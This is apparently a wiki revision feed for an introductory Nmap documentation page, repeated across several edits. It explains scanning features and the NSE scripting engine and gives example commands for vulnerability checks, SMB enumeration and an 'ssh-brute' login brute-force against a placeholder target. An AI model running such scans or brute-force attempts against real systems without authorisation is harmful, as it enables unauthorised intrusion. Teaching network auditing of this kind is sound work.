== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap output on a specific host.png]]&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Nmap_output_on_specific_host.png&amp;diff=11182</id>
		<title>File:Nmap output on specific host.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Nmap_output_on_specific_host.png&amp;diff=11182"/>
		<updated>2023-01-27T17:55:42Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11181</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11181"/>
		<updated>2023-01-27T17:53:49Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11180</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11180"/>
		<updated>2023-01-27T17:52:11Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11179</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11179"/>
		<updated>2023-01-27T17:50:55Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11178</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11178"/>
		<updated>2023-01-27T17:49:06Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11177</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11177"/>
		<updated>2023-01-27T17:48:55Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* •	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet. */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
•	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
 •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11176</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11176"/>
		<updated>2023-01-27T17:48:44Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system. */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
•	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
 •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
=== •	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11175</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11175"/>
		<updated>2023-01-27T17:48:35Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* •	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service. */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
•	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
=== •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system. ===&lt;br /&gt;
&lt;br /&gt;
=== •	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
